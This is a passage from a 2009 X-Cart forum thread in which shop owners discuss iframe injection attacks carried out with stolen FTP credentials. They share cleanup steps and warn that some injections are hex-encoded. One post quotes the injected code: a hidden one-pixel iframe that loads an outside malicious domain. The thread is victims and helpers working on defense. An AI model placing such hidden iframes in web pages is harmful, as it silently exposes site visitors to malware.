Follow us on Twitter X-Cart on Facebook Wiki
Shopping cart software Solutions for online shops and malls

Warning: Iframe based attacks using stolen FTP access info
 
Reply
   X-Cart forums > News and Announcements
 
Thread Tools
  #231  
Old 02-22-2009, 08:55 AM
  bigredseo's Avatar 
bigredseo bigredseo is offline
 

X-Man
  
Join Date: Oct 2002
Location: Omaha, NE, USA
Posts: 2,367
 

Default Re: Warning: Iframe based attacks using stolen FTP access info

We haven't had an iFrame incident since this issue back in December. Was everything secured and updated on the server levels? Have you scanned the server and contacted those users that were infected and told them to update their software?
__________________
Conor Treacy - Big Red SEO - @bigredseo
Search Engine Optimization & Internet Marketing - We Bring Your Website Out Of Hiding!
If you can't be found on Google, Bing or Yahoo, you pretty much don't exist on the Internet.
Omaha SEO Office with National & Local SEO Services
Hourly Consulting - great for SEO Disaster Recovery, Audits and DIY Guidance
Reply With Quote
  #232  
Old 02-24-2009, 06:16 AM
 
shellshack shellshack is offline
 

Member
  
Join Date: Oct 2008
Posts: 15
 

Default Re: Warning: Iframe based attacks using stolen FTP access info

I am somewhat hesitant to say my problem is solved but my hacker hasn't been back in a couple of months. I believe my hacker was gaining access through my shared server. I moved to hands-on and so far so good. Blue+cheap=hacked?
__________________
4.1.11
Reply With Quote
  #233  
Old 05-18-2009, 09:59 AM
 
samz724 samz724 is offline
 

Advanced Member
  
Join Date: May 2007
Posts: 84
 

Exclamation Re: Warning: Iframe based attacks using stolen FTP access info

Sorry to break the "silence" but our site was hacked (iframe) on 05/12/2009!

I have cleaned/replaced the index.php files, home.php files, etc. that have the line of code in them..

However, if you go into any page of the site (including admin pages) and click to view the source code.. the iframe link still exists

<p /><iframe src="http://brugeni.net/?click=313114" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>



I've read through this entire thread and if any one have any idea what's causing this? Please let me know. Thanks for your help!
__________________
Samz
--------------------------------------
Heavily modified
X-Cart Gold v4.1.10
Reply With Quote
  #234  
Old 05-18-2009, 10:06 AM
 
balinor balinor is offline
 

Veteran
  
Join Date: Oct 2003
Location: Connecticut, USA
Posts: 30,253
 

Default Re: Warning: Iframe based attacks using stolen FTP access info

That means there is an iframe still in your code somewhere - you need to look through ALL of your files, as there are quite a number that are usually injected. Your host can help with this, as they have tools to scan your entire site quickly.
__________________
Padraic Ryan
Ryan Design Studio
Professional E-Commerce Development
Reply With Quote

The following user thanks balinor for this useful post:
samz724 (05-18-2009)
  #235  
Old 05-18-2009, 10:10 AM
 
samz724 samz724 is offline
 

Advanced Member
  
Join Date: May 2007
Posts: 84
 

Exclamation Re: Warning: Iframe based attacks using stolen FTP access info

Thanks for the reply. I have Hands-on doing a scan.. we'll see what the results are

Any thoughts on how to prevent another attack?

Thanks
__________________
Samz
--------------------------------------
Heavily modified
X-Cart Gold v4.1.10
Reply With Quote
  #236  
Old 05-18-2009, 10:14 AM
  gb2world's Avatar 
gb2world gb2world is offline
 

X-Wizard
  
Join Date: May 2006
Location: Austin, TX
Posts: 1,970
 

Default Re: Warning: Iframe based attacks using stolen FTP access info

Also clear your browser cache and run cleanup.php - you may be looking at files complied before you cleaned up.
Hands-on was very responsive when I got hit with this - so it is good you are there. They also helped me to correctly set up ftps, just in case insecure ftp has something to do with this attack.
__________________
X-CART (4.1.9,12/4.2.2-3/4.3.1-2/4.4.1-5)-Gold
(CDSEO, Altered-Cart On Sale, BCSE Preorder Backorder, QuickOrder, X-Payments, BCSE DPM Module)
Reply With Quote
  #237  
Old 05-18-2009, 10:18 AM
  gb2world's Avatar 
gb2world gb2world is offline
 

X-Wizard
  
Join Date: May 2006
Location: Austin, TX
Posts: 1,970
 

Default Re: Warning: Iframe based attacks using stolen FTP access info

Quote:
Any thoughts on how to prevent another attack?

read this
__________________
X-CART (4.1.9,12/4.2.2-3/4.3.1-2/4.4.1-5)-Gold
(CDSEO, Altered-Cart On Sale, BCSE Preorder Backorder, QuickOrder, X-Payments, BCSE DPM Module)
Reply With Quote
  #238  
Old 05-18-2009, 12:10 PM
  BCSE's Avatar 
BCSE BCSE is offline
 

X-Man
  
Join Date: Apr 2003
Location: Ohio - bcsengineering.com
Posts: 2,885
 

Default Re: Warning: Iframe based attacks using stolen FTP access info

Also, I have seen Iframe attacks be encoded in HEX. So you may not be able to look for "iframe" per say in the templates.

It could be a bunch of Hex equivalent characters.

Good luck!

Thanks,

Carrie
__________________
Custom Development, Custom Coding and Pre-built modules for X-cart since 2002!

We support X-cart versions 3.x through 5.x!

Home of the famous Authorize.net DPM & CIM Modules, Reward Points Module, Point of Sale module, Speed Booster modules and more!


Over 200 X-cart Mods available & Thousands of Customizations Since 2002 - bcsengineering.com

Please E-Mail us for questions/support!
Reply With Quote
  #239  
Old 05-25-2009, 06:42 AM
  bigredseo's Avatar 
bigredseo bigredseo is offline
 

X-Man
  
Join Date: Oct 2002
Location: Omaha, NE, USA
Posts: 2,367
 

Default Re: Warning: Iframe based attacks using stolen FTP access info

In recent days we've been seeing the HEX add too.. instaed of a regular iframe injection, there's document.write being used in the script portion and everything in there is encoded.

Makes it a little harder to SEE what's an issue, but the injections still appear to be going at the bottom of files, so they're still easy enough to spot.
__________________
Conor Treacy - Big Red SEO - @bigredseo
Search Engine Optimization & Internet Marketing - We Bring Your Website Out Of Hiding!
If you can't be found on Google, Bing or Yahoo, you pretty much don't exist on the Internet.
Omaha SEO Office with National & Local SEO Services
Hourly Consulting - great for SEO Disaster Recovery, Audits and DIY Guidance
Reply With Quote
  #240  
Old 05-25-2009, 07:10 AM
 
TA TA is offline
 

eXpert
  
Join Date: Apr 2006
Posts: 299
 

Default Re: Warning: Iframe based attacks using stolen FTP access info

Are these recent attacks still going through FTP with the correct username and password?
__________________
v4.7.3 [unix]
Reply With Quote
Reply
   X-Cart forums > News and Announcements


Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT -8. The time now is 04:08 AM.

   

 
X-Cart forums © 2001-2018